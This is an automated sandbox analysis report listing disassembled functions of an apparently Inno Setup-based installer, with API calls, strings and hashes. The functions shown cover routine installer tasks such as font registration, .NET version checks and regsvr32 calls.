                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                            • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                            • String ID:
                                                                            • API String ID: 1694776339-0
                                                                            • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                            • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                            • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                            • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00422158 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMenu.USER32(00000000,00000000), ref: 004221A3
                                                                            • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 004221C1
                                                                            • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221CE
                                                                            • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221DB
                                                                            • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 004221E8
                                                                            • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 004221F5
                                                                            • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422202
                                                                            • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042220F
                                                                            • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 0042222D
                                                                            • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 00422249
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$EnableItem$System
                                                                            • String ID:
                                                                            • API String ID: 3985193851-0
                                                                            • Opcode ID: b8b89d1ef914de5f4b700308a8a2e79f02337078b5e803e02db0f43c2e7e4a28
                                                                            • Instruction ID: e98f5eede000e984507cfb68b46ad6efe0a5c83d9602cc3651cf502f29ecaa29
                                                                            • Opcode Fuzzy Hash: b8b89d1ef914de5f4b700308a8a2e79f02337078b5e803e02db0f43c2e7e4a28
                                                                            • Instruction Fuzzy Hash: 23213370380744BAE720D725DD8BF9B7BD89B04708F0444A5BA487F2D7C6F9AE40869C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047BE00 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 167windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FreeLibrary.KERNEL32(10000000), ref: 0047BFA8
                                                                            • FreeLibrary.KERNEL32(022E0000), ref: 0047BFBC
                                                                            • SendNotifyMessageA.USER32(00020446,00000496,00002710,00000000), ref: 0047C021
                                                                            Strings
                                                                            • Restarting Windows., xrefs: 0047BFFC
                                                                            • Deinitializing Setup., xrefs: 0047BE1E
                                                                            • GetCustomSetupExitCode, xrefs: 0047BE5D
                                                                            • Not restarting Windows because Setup is being run from the debugger., xrefs: 0047BFDD
                                                                            • DeinitializeSetup, xrefs: 0047BEB9
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLibrary$MessageNotifySend
                                                                            • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                            • API String ID: 3817813901-1884538726
                                                                            • Opcode ID: 99f915d00c11ec276e19136852c787799f8d5699edd2cc415edbfead57b4d6dc
                                                                            • Instruction ID: 5aabc136c0a50bbda2486703200ad66b9283696e7d5460ba133d2cc504fcf864
                                                                            • Opcode Fuzzy Hash: 99f915d00c11ec276e19136852c787799f8d5699edd2cc415edbfead57b4d6dc
                                                                            • Instruction Fuzzy Hash: 2251BF30600A019FD712DB69E899B9A77A4EB59704F60C4BBF808C73A1DB789C45CF9D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00457858 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 130registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00457770: RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,?,00000000,?,00000002,004578A2,00000000,004579EF,?,00000000,00000000,00000000), ref: 004577BD
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004579EF,?,00000000,00000000,00000000), ref: 004578FE
                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,004579EF,?,00000000,00000000,00000000), ref: 00457964
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            Strings
                                                                            • v2.0.50727, xrefs: 004578F0
                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v2.0, xrefs: 004578B2
                                                                            • .NET Framework not found, xrefs: 004579B2
                                                                            • .NET Framework version %s not found, xrefs: 0045799E
                                                                            • v1.1.4322, xrefs: 00457956
                                                                            • SOFTWARE\Microsoft\.NETFramework\Policy\v1.1, xrefs: 00457918
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Close$Open
                                                                            • String ID: .NET Framework not found$.NET Framework version %s not found$SOFTWARE\Microsoft\.NETFramework\Policy\v1.1$SOFTWARE\Microsoft\.NETFramework\Policy\v2.0$v1.1.4322$v2.0.50727
                                                                            • API String ID: 2976201327-1070292914
                                                                            • Opcode ID: 459b95da5429d7d35dab5d0c6b2d4d5a6c6ec011e70205ce483ffcd3ec2b4037
                                                                            • Instruction ID: c0ad98b253435a04450e4f0d412c4263007441af3f925dfe38269f217dae66aa
                                                                            • Opcode Fuzzy Hash: 459b95da5429d7d35dab5d0c6b2d4d5a6c6ec011e70205ce483ffcd3ec2b4037
                                                                            • Instruction Fuzzy Hash: 2741EC70A081465FDB00DFA5E851BDE77B5EB49305F54447BE400DB243D7799A0ECB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045DC20 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SHGetMalloc.SHELL32(?), ref: 0045DC5B
                                                                            • GetActiveWindow.USER32 ref: 0045DCBF
                                                                            • CoInitialize.OLE32(00000000), ref: 0045DCD3
                                                                            • SHBrowseForFolder.SHELL32(?), ref: 0045DCEA
                                                                            • 76C9D120.OLE32(0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DCFF
                                                                            • SetActiveWindow.USER32(?,0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DD15
                                                                            • SetActiveWindow.USER32(?,?,0045DD2B,00000000,?,?,?,?,?,00000000,0045DDAF), ref: 0045DD1E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ActiveWindow$BrowseD120FolderInitializeMalloc
                                                                            • String ID: A
                                                                            • API String ID: 2698730301-3554254475
                                                                            • Opcode ID: 35e8b70af3f9a11701dc89ad6a7dc5067c9e57c40fd942637c72eceddb9e2f2f
                                                                            • Instruction ID: cf29a6196fb2df87458bc734ae7ceebd32c59f4afd20480d407c1097e6e56ab9
                                                                            • Opcode Fuzzy Hash: 35e8b70af3f9a11701dc89ad6a7dc5067c9e57c40fd942637c72eceddb9e2f2f
                                                                            • Instruction Fuzzy Hash: E0311271D00208AFDB11EFB6D886A9EBBF8EF09304F51447AF804E7252D7785A44CB59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00418BC4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(0000000E), ref: 00418BE0
                                                                            • GetSystemMetrics.USER32(0000000D), ref: 00418BE8
                                                                            • 6F542980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418BEE
                                                                              • Part of subcall function 00409920: 6F53C400.COMCTL32((FI,000000FF,00000000,00418C1C,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00409924
                                                                            • 6F5ACB00.COMCTL32((FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C3E
                                                                            • 6F5AC740.COMCTL32(00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418C49
                                                                            • 6F5ACB00.COMCTL32((FI,00000001,?,?,00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000), ref: 00418C5C
                                                                            • 6F540860.COMCTL32((FI,00418C7F,?,00000000,?,(FI,00000000,00000000,00000000,00000000,00418C78,?,00000000,0000000D,00000000,0000000E), ref: 00418C72
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: MetricsSystem$C400C740F540860F542980
                                                                            • String ID: (FI
                                                                            • API String ID: 3392676452-1614602237
                                                                            • Opcode ID: a62bb13e1bd7fa3b9c7351fff79d2a2ecdea0cb757dbaccc16c00855b604fece
                                                                            • Instruction ID: 8ee50baf9f6b03e6802097753a63af578849a2694d0e9ed51cb84c1dfac16794
                                                                            • Opcode Fuzzy Hash: a62bb13e1bd7fa3b9c7351fff79d2a2ecdea0cb757dbaccc16c00855b604fece
                                                                            • Instruction Fuzzy Hash: B51136B5744204BADB10EBF5DC82F5E73B8DB49704F50406AB604E72D2E6799D408768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045B5D8 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcAddress.KERNEL32(022E0000,inflateInit_), ref: 0045B5E1
                                                                            • GetProcAddress.KERNEL32(022E0000,inflate), ref: 0045B5F1
                                                                            • GetProcAddress.KERNEL32(022E0000,inflateEnd), ref: 0045B601
                                                                            • GetProcAddress.KERNEL32(022E0000,inflateReset), ref: 0045B611
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc
                                                                            • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                            • API String ID: 190572456-3516654456
                                                                            • Opcode ID: 0244c5342f474d5f0d92f6c90a29f5f03fc9f5158d69ccc7f6593d0f4fc18990
                                                                            • Instruction ID: fd82cc1e756c275edc3707c7f07377cec179b09f743abcb6ba5c01fe1bd4d686
                                                                            • Opcode Fuzzy Hash: 0244c5342f474d5f0d92f6c90a29f5f03fc9f5158d69ccc7f6593d0f4fc18990
                                                                            • Instruction Fuzzy Hash: E5012CB0500746DEEB14DF72EC90B2736A5E7E870AF14803BA845562AADB7C044BCE5D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0041A84C Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0041A929
                                                                            • 73A14D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A963
                                                                            • SetBkColor.GDI32(?,?), ref: 0041A978
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041A9C2
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041A9CD
                                                                            • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041A9DD
                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AA1C
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0041AA26
                                                                            • SetBkColor.GDI32(00000000,?), ref: 0041AA33
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Color$StretchText
                                                                            • String ID:
                                                                            • API String ID: 2984075790-0
                                                                            • Opcode ID: 96642afef6407557abda8c1cb6f38d9a010b32914ce32b6cc36c1a5a9073b633
                                                                            • Instruction ID: 5791d4d8e51028595b948ed591e6ff6c43c29dc3dd821c9bc5bae20fa008be23
                                                                            • Opcode Fuzzy Hash: 96642afef6407557abda8c1cb6f38d9a010b32914ce32b6cc36c1a5a9073b633
                                                                            • Instruction Fuzzy Hash: F661E5B5A00104EFCB40EFA9D985E9AB7F8AF0D314B10816AF518DB252C734ED41CF58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00455F7C Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042D7A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D7B3
                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00456130,?, /s ",?,regsvr32.exe",?,00456130), ref: 004560A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDirectoryHandleSystem
                                                                            • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                            • API String ID: 2051275411-1862435767
                                                                            • Opcode ID: 1ae4d1559c225658233d195df01a5ac76f1bcba5e74ca4c9dacf9a152af87d32
                                                                            • Instruction ID: 1b1342de70b8511bd96e109cd760b193c6bc6e2768a22c9f7c7172ce61990ba6
                                                                            • Opcode Fuzzy Hash: 1ae4d1559c225658233d195df01a5ac76f1bcba5e74ca4c9dacf9a152af87d32
                                                                            • Instruction Fuzzy Hash: 95411970E007085BDB10EFE5C842B9DB7F9AF44305F91407BA904BB297D7789A098B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0044CA0C Relevance: 13.6, APIs: 9, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OffsetRect.USER32(?,00000001,00000001), ref: 0044CA3D
                                                                            • GetSysColor.USER32(00000014), ref: 0044CA44
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044CA5C
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CA85
                                                                            • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044CA8F
                                                                            • GetSysColor.USER32(00000010), ref: 0044CA96
                                                                            • SetTextColor.GDI32(00000000,00000000), ref: 0044CAAE
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CAD7
                                                                            • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044CB02
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Text$Color$Draw$OffsetRect
                                                                            • String ID:
                                                                            • API String ID: 1005981011-0
                                                                            • Opcode ID: 9e5c892965933efe92cb1196a4cf079dced8b69e9bfa1b103b040bba4ee2a0e0
                                                                            • Instruction ID: 79e5725ec2e75caab84353522faa1c644d19f3f9c4a46f72b84b259f8bdbd55b
                                                                            • Opcode Fuzzy Hash: 9e5c892965933efe92cb1196a4cf079dced8b69e9bfa1b103b040bba4ee2a0e0
                                                                            • Instruction Fuzzy Hash: 3921EFB42015047FC710FB2ACC8AE8BBBECDF19319B01457A7918EB393C678DD408669
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00472E88 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00472DB0: GetWindowThreadProcessId.USER32(00000000), ref: 00472DB8
                                                                              • Part of subcall function 00472DB0: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00472EAF,00494F8C,00000000), ref: 00472DCB
                                                                              • Part of subcall function 00472DB0: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00472DD1
                                                                            • SendMessageA.USER32(00000000,0000004A,00000000,B2G), ref: 00472EBD
                                                                            • GetTickCount.KERNEL32 ref: 00472F02
                                                                            • GetTickCount.KERNEL32 ref: 00472F0C
                                                                            • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00472F61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                            • String ID: B2G$CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                            • API String ID: 613034392-3430418260
                                                                            • Opcode ID: 83606b9c116b6885daef421b7b8e00522d494f7ddc4e48254dfbdcdd32f55c78
                                                                            • Instruction ID: 8c95786dad12656d13a73ee76c7a4d3a126e112e6abc10061d0091179ba2d091
                                                                            • Opcode Fuzzy Hash: 83606b9c116b6885daef421b7b8e00522d494f7ddc4e48254dfbdcdd32f55c78
                                                                            • Instruction Fuzzy Hash: 00319174E002159ADB10EBB9C9867EEB6F09F44304F60843AF548EB392D7BC8E41879D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00490414 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90sleepsynchronizationthreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0044FE04: SetEndOfFile.KERNEL32(?,?,0045A666,00000000,0045A7F1,?,00000000,00000002,00000002), ref: 0044FE0B
                                                                              • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00494628,00492509,00000000,0049255E,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                            • GetWindowThreadProcessId.USER32(00000000,?), ref: 004904A5
                                                                            • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 004904B9
                                                                            • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004904D3
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904DF
                                                                            • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904E5
                                                                            • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004904F8
                                                                            Strings
                                                                            • Deleting Uninstall data files., xrefs: 0049041B
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                            • String ID: Deleting Uninstall data files.
                                                                            • API String ID: 1570157960-2568741658
                                                                            • Opcode ID: 3a7a3c4f988273c5faf0984e358184faf661e247c75e3eb8a852b62590ab03d6
                                                                            • Instruction ID: c015f2c418b27fe41d2ce248e3be245557a268e7959eb0275d209c4c83f57638
                                                                            • Opcode Fuzzy Hash: 3a7a3c4f988273c5faf0984e358184faf661e247c75e3eb8a852b62590ab03d6
                                                                            • Instruction Fuzzy Hash: DB21BB70344700AEEB21EB76EC55F2B77A8EB55744F60453BBA04DA6D2D6BC9C008B1C
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0046BC24 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89registrywindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0042DC54: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0047DDF7,?,00000001,?,?,0047DDF7,?,00000001,00000000), ref: 0042DC70
                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046BD21,?,?,?,?,00000000), ref: 0046BC8B
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,0046BD21), ref: 0046BCA2
                                                                            • AddFontResourceA.GDI32(00000000), ref: 0046BCBF
                                                                            • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0046BCD3
                                                                            Strings
                                                                            • Failed to open Fonts registry key., xrefs: 0046BCA9
                                                                            • Failed to set value in Fonts registry key., xrefs: 0046BC94
                                                                            • AddFontResource, xrefs: 0046BCDD
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                            • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                            • API String ID: 955540645-649663873
                                                                            • Opcode ID: 7a6271196282a98db9218d46e73dadc0b019169c58c33c438b6e42a7b698be6e
                                                                            • Instruction ID: 8028dfed4777ef4cba2b708c37a4b099d1cdf5d3aae4b1ac28208e9a303e9908
                                                                            • Opcode Fuzzy Hash: 7a6271196282a98db9218d46e73dadc0b019169c58c33c438b6e42a7b698be6e
                                                                            • Instruction Fuzzy Hash: E121B2707402047BE710EBA69C42F6E67ACDB55704F60443BB900EB2C2EB7D9E4596AE
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0045F330 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 75windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00416380: GetClassInfoA.USER32(00400000,?,?), ref: 004163EF
